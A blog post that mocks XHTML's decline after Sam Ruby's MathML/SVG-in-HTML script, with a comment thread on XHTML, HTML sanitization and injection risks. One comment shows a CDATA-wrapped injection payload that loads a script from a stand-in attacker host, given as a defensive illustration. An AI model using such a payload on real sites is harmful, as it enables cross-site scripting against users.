Revenge is a Dish Best Served Cold

Via Jacques, it looks like Sam Ruby has written some JavaScript that enables you to embed MathML and SVG in an HTML 4 document. XHTML is no longer required. Wow. Ever since XHTML came out, the only thing XHTML 1.1 has been able to do that HTML 4.01 couldn’t do was embed MathML and SVG. Now that’s gone.

There is also a little historical irony here.

At the 2004 W3C Workshop on Web Applications and Compound Documents, prominent W3C member and co-inventor of CSS Bert Bos went on record saying that JavaScript is the worst invention ever.

That always seemed harsh to me. Sure, JavaScript can be dangerous. You can easily shoot yourself in the face with it, boy howdy. But really, the worst invention ever? No wonder that Brendan Eich, inventor of JavaScript, expressed his irritation at the time — although this was less over the W3C calling his “baby” ugly and more about the disconnect between W3C’s recent work and the actual needs of web developers. In fact, it was right about this time that the WHATWG started picking up steam. But that’s another story.

Now fast-forward a couple of years. XHTML was the W3C’s baby.[1] But with a not-particularly-long snippet of JavaScript, Sam Ruby has kicked the chair out from under XHTML. Actually, that’s not really the right image. Imagine a man with a chiseled jaw in a nearly immaculate tuxedo, Agent XHTML, clinging desperately to the edge of a sheer cliff with just two fingers. A dark, menacing, bearded figure approaches. “So,” he sneers, “you’re the best the W3C has?” Agent X looks up. “Ruby. I should have known you’d become a minion of J.A.V.A.S.C.R.I.P.T. Your evil master will never succeed in poisoning the World Wide Web!” Ruby just shrugs. “It’s a long way down, Agent X,” he says. Then he stomps on Agent XHTML’s fingers. The tuxedoed man plummets, screaming all the way down. Meanwhile, somewhere in his underground lair, the shadowy criminal mastermind known only as “Mr. Eich” watches all of this on a screen, stroking his pet cat thoughtfully. Hmmm, or does Brendan have a shark tank? Because that would be totally awesome.

1. Or more accurately, the last thing they’ve thrown over the wall to webdevs in the last five years.

17 thoughts on “Revenge is a Dish Best Served Cold”

  1. I disagree. XHTML is still really useful – because it is XML. I understand the frustration at the pie-in-the-sky development model the W3C seems to use, but XHTML solves a fundamental, real-life problem, namely structurally sound output generation (which is difficult to do right in HTML, and has huge security implications).

    XHTML still serves a purpose.

  2. Hi Eamon — I tried to put my comments on your blog entry, but there was a Blogger error and I can’t tell if my post got eaten. So I’ll reproduce the comment here as well:

    Hi Eamon,

    First, thanks very much for writing, and your thoughts on the matter.

    On the screenscraping issue. First, let’s note the interesting fact that you already have to pass the site through Tidy, whether or not the owner of the site claims that the page is “XHTML”. That’s because you and I both know that over 90% of the time (really! I’ve measured this), passing that “XHTML” page through an XML parser would blow up our parser. 😉 This should be a big red flag about XHTML and any benefits about its purported XML nature right there.

    Second, there are plenty of fine tools for parsing and screenscraping HTML. Python’s SGMLParser, for instance, has worked great for my purposes. Anything you can Tidy and scrape as XHTML, I can Tidy and scrape as HTML — or often, I can just scrape as HTML.

    Third, screenscraping is a bad idea for anything other than the quickest-and-dirtiest kind of software. This is because the owner of the site almost certainly doesn’t know or care that they are providing structured data to you. There’s no contract here. If they *did* care about this they would provide a real API or at least an RSS/Atom feed.

    On XHTML security. The MySpace XSS vulnerability relies on invalid HTML. Allow me to officially speak with my “Evan Goer” hat on, and not my “Employee of a competitor of MySpace” hat on: MySpace was utterly stupid to allow that sort of unsanitized user input to go through.

    You are right that forcing user input to be valid XHTML significantly reduces your attack surface. But so would forcing user input to be valid HTML. Tidy and its libraries are perfectly capable of cleaning up bad HTML (or rejecting stuff that is too pathological). If you can produce a tool that generates valid XML, you can produce a tool that generates valid HTML too.

    But MORE important: the real lesson, and one that is repeated over and over by security experts at my company and elsewhere, is that you cannot trust user input and you must sanitize the hell out of it. If you do want to allow any sort of structured user input, any sane user input system only allows a small, explicit subset of elements and attributes. Please, I beg you, do not rely on creating valid HTML or XHTML for sanitization. If you allow arbitrary valid (X)HTML, you will get owned. (Actually, the best thing of all is not to build your own sanitization system, but to take one that has already been well-tested in the wild.)

    Since we’re on the subject of parser bugs, here’s a nasty remote execution vulnerability from a month ago that affected Drupal, due to a bug in its XML parser:

    http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2006-10/msg00320.html

    If you search for “XML parser vulnerability” or “XML parser XSS” or the like, it’s easy to find many more such issues…
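The point made earlier in this comment, that markup labelled “XHTML” tends to blow up a strict XML parser while HTML tooling copes with it, can be sketched in Python. This is only an illustration under stated assumptions: the sample markup and the helper names (`parses_as_xml`, `html_start_tags`) are invented here, and since `SGMLParser` is no longer part of Python 3, the standard library's `html.parser` stands in for it.

```python
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Hypothetical tag soup: <br> is never closed and <b> is still open at </p>.
SAMPLE = "<html><body><p>Unclosed paragraph<br><b>bold</p></body></html>"


def parses_as_xml(markup):
    """Return True only if a strict XML parser accepts the markup."""
    try:
        ET.fromstring(markup)
        return True
    except ET.ParseError:
        return False


class TagCollector(HTMLParser):
    """Records every start tag the lenient HTML parser encounters."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def html_start_tags(markup):
    """Feed the markup to the HTML parser and return the start tags seen."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    print(parses_as_xml(SAMPLE))    # the XML parser rejects the tag soup
    print(html_start_tags(SAMPLE))  # the HTML parser still reports the tags
```

The XML parser gives up at the first mismatched tag, whereas the HTML parser keeps going, which is roughly why a scraper ends up treating such pages as HTML regardless of their doctype.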

  3. An addendum about the security approach: at my company, some business units (“properties”) have tried a whitelist of elements and attributes, some have tried a blacklist of elements and attributes. My understanding is that every time a property used the blacklist approach, they were very, very sorry.
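A whitelist of elements and attributes, as described in the two comments above, might look roughly like the following Python sketch. Everything specific in it is an assumption made for illustration: the allowed tags, the allowed attributes, the URL prefixes, and the names `WhitelistSanitizer` and `sanitize`. It does not balance tags or cover every corner case, and the earlier advice still stands: a well-tested existing sanitizer is preferable to a homemade one.

```python
from html import escape
from html.parser import HTMLParser

# Assumed policy for illustration: a small, explicit set of tags and attributes.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL_PREFIXES = ("http://", "https://")


class WhitelistSanitizer(HTMLParser):
    """Re-emits only whitelisted tags and attributes; all text is escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown element: drop the tag itself
        kept = []
        for name, value in attrs:
            if value is None or name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # unknown attribute (onclick, style, ...): drop it
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_PREFIXES):
                continue  # drops javascript: and other unexpected schemes
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is always escaped, so it can never introduce new markup.
        self.out.append(escape(data))


def sanitize(markup):
    """Return the markup with everything outside the whitelist removed."""
    sanitizer = WhitelistSanitizer()
    sanitizer.feed(markup)
    sanitizer.close()
    return "".join(sanitizer.out)


if __name__ == "__main__":
    print(sanitize('<p onclick="evil()">Hi <b>there</b></p>'))
    print(sanitize('<a href="javascript:alert(1)">x</a>'))
```

The design choice worth noting is that the parser output is rebuilt from scratch rather than edited in place: anything the policy does not name simply never reaches the output, which is the property a blacklist cannot offer.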

  4. Hi, Sam! Hmmm. Right now I could update my feed from a rather crappy CDATA-escaped Atom 0.3 to Atom 1.0. But I won’t be able to wean myself off of CDATA until after I upgrade Movable Type 2.x (end of December) at the earliest. Is that acceptable?

  5. Well, the “you would make a nice addition to my planet” bit sounded so gosh darn ominous. I was kinda worried what would happen if I failed to pay obeisance to our new Planetary Overlord.

  6. Sorry about the posting issue; the posts weren’t eaten and are now online. In an (apparently vain) attempt to avoid supporting an install of yet another piece of software I hoped blogger would Just Work; since all dynamic content is hosted – and hopefully secured – by blogger/google, security issues should be less of my problem. However, the ftp-publishing is very delayed (it seems I need to manually intervene or wait for a long long time for it to update the site), which is very confusing if that’s not what you’re expecting.

    In any case, you rightly point out that XHTML as a security measure is something superfluous: you could just as well parse and validate HTML, and then process that. But why do it the easy way….

    The issue is clearly that the browser trusts all content coming from a server identically – and fails to distinguish between content permitted to do things and potentially foreign “embedded” content. The only way to be safe is to avoid embedded content completely – you can only ever send content which does not contain any hidden information that you don’t process when the browser does.

    We need to have a meaningful internal representation of HTML content. With that, we can meaningfully sanitize by whitelisting (and even then, corner cases like user-provided links, CSS styles, etc etc need to be dealt with). And this is the crux; that’s much much easier to do if the programming environment supports having such an internal representation. Sure, you can make your own HTML parser or try to take an existing one; but none of that is as easy as using the rich XML support most languages offer.

    I don’t think it’s really possible to make an HTML sanitizer on plain strings. And converting to and from XML and dealing with XML internally is simpler than dealing with HTML internally.

    Of course, you’d be crazy to assume that XHTML in the wild is valid – of course it’s not. But it’s not really that important, is it?

  7. Well, Sam said in one sentence what I was fumbling around trying to say for several paragraphs. Glad my job doesn’t depend on being able to concisely explain technical subjects or anything like that.

    Eamon, maybe this is really all about aesthetics? Anyone can work out the sanitization part of their CMS — or heck, the entire CMS itself — any way they like. People who have built their own blogging software or CMS often use XML+XSLT, and they often say that they just really like the fact that their software is XML end-to-end. Producing HTML 4 at the last step just seems artificial to them. I can’t argue with that.

    But from my perspective, their system is a black box. Maybe their source is XML, maybe it’s flat files, maybe they’re using a bootleg copy of AOL Server 2.0, I don’t know. I only see what they send to the browser. And what bothers my sense of aesthetics is serving up a mishmash of angle brackets that maybe should be one thing, but actually gets parsed as something else, and basically ends up being neither. (Or you can try to deliver your XML so that the browsers parse it as XML… which is more aesthetically pleasing, but also much more dangerous.)

    Finally I do think it is neat that the (X)HTML 5 folks are trying to reconcile the nasty mess I described above. Maybe HTML 5 will end up satisfying aesthetes from both schools, server-side and client-side.

  8. I agree that sending text to some clients right now is better done as HTML not XHTML. You should not send XML-encoded HTML as if it were HTML with content-type text/html because… well… it’s not ;-). However, it’s trivial to output validly encoded html using xslt; so you can pretend you’re using XHTML right up until that last step.

    As far as I can tell, valid encoding is much more important than valid structure. It’s nice to have both of course – but if you accidentally place text where none is allowed, or leave out an alt-attribute on some non-semantic image, you’re unlikely to have many problems, even though you’re technically producing invalid html.

    I’m curious why you say sending xml as xml is much more dangerous? The web framework we’re using here can transparently switch between server-side XSLT transforming to HTML 4 on the client, and client-side XSLT. Since the only output to ever reach the browser is output generated by an xml serializer, the only way to produce invalid xml is either by trying hard (some serializers allow explicit hacks, which you should try not to use of course) or by a bug in the serializer. I’ve not encountered one yet, and given the far simpler structure of xml vs. html, I don’t expect there to be nearly as many.

    I can give you ammo for not producing XHTML server side and sending it as HTML (i.e. content-type text/html): The browser will interpret it as html then, and that does not quite follow xml rules. It therefore becomes possible to perform smart injection attacks again because the model you’re producing isn’t the one the client will see.

    So I guess your approach to this is the only correct one: if you’re producing HTML, then produce HTML, and not XHTML. I was conflating that with server-side processing, which I’m still pretty sure you should only do using a syntax-guaranteeing serializer (say, DOM, XSLT, or a number of push or pull models).
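The idea of a syntax-guaranteeing serializer from the comment above can be sketched in Python with the standard library's `xml.etree.ElementTree`. The element names, the `render_comment` helper, and the hostile input are assumptions made up for this illustration; the point is only that output built as a tree and then serialized stays well-formed, while string concatenation does not.

```python
import xml.etree.ElementTree as ET


def render_comment(author, body):
    """Build the markup as a tree and let the serializer do the escaping."""
    div = ET.Element("div", {"class": "comment", "title": author})
    paragraph = ET.SubElement(div, "p")
    paragraph.text = body  # stored as text, never parsed as markup
    return ET.tostring(div, encoding="unicode")


def render_comment_naively(author, body):
    """String concatenation: the user input becomes part of the markup."""
    return f'<div class="comment" title="{author}"><p>{body}</p></div>'


if __name__ == "__main__":
    hostile_author = 'Eve "the" <b>'
    hostile_body = '</p><script>alert("x")</script>'
    print(render_comment(hostile_author, hostile_body))
    print(render_comment_naively(hostile_author, hostile_body))
```

Parsing the serialized output back yields exactly the original strings as text and attribute values, whereas the naive version is not even well-formed for this input.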

  9. Yeah, exactly… the “but it’s not!” part is what offends my aesthetics. 🙂 (Not that I can’t ignore my sense of aesthetics if I have to.)

    Oh, and I just say serving XHTML as XML is dangerous because it raises the possibility of the Yellow Screen of Death. For some backend systems, the odds of this happening will be practically zero, others will be at higher risk. Either way, it’s still a risk.

    That injection attack vector sounds interesting. Do you have a concrete example?

  10. The injection attack vector would be something containing a cdata section for instance. In xhtml this would be a properly escaped string, but in html it has no meaning, so you could for instance embed script tags in it. So for instance something like this:


    <![CDATA[ >
    <script src="http://evilhaxor.org/evilscript.js"></script>
    < ]]>

    PS. How is blogspot questionable content? Now I can’t enter the url of my blog -.-
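The mismatch described in the comment above can be sketched in Python. The XML side uses the standard library's XML parser. The HTML side is a deliberate simplification, not a real browser: it assumes the rule, later written down in the HTML5 parsing algorithm, that `<![CDATA[` in ordinary HTML content starts a bogus comment ending at the first `>`. The helper names (`xml_view`, `html_view`, `live_tags`) are hypothetical.

```python
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# The payload from the comment above.
PAYLOAD = (
    "<![CDATA[ >\n"
    '<script src="http://evilhaxor.org/evilscript.js"></script>\n'
    "< ]]>"
)


def xml_view(payload):
    """Text an XML parser sees when the payload sits inside a <p> element."""
    return ET.fromstring(f"<p>{payload}</p>").text


def html_view(payload):
    """Assumed model of a text/html parser: the CDATA opener is treated as a
    bogus comment that ends at the first '>', so the rest is live markup."""
    return payload[payload.index(">") + 1:]


class StartTags(HTMLParser):
    """Records the start tags found in whatever markup it is fed."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def live_tags(payload):
    """Start tags that remain active once the bogus comment is skipped."""
    collector = StartTags()
    collector.feed(html_view(payload))
    collector.close()
    return collector.tags


if __name__ == "__main__":
    print(repr(xml_view(PAYLOAD)))  # one inert text node in the XML model
    print(live_tags(PAYLOAD))       # a script start tag in the HTML model
```

Under these assumptions the same bytes are harmless character data to the XML toolchain that produced them and an executable script element to a client that parses them as HTML.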

  11. Ah, thanks Mark.

    Sorry about blocking Blogspot. About a year back, I was getting a storm of blog spam claiming to be from there, so I got irritated and just blacklisted the entire domain. But now that I’ve added that cheesy “Your Favorite Color” field, blog spam has dropped to practically zero, for now. So I’ve re-enabled blogspot. Crossing my fingers...
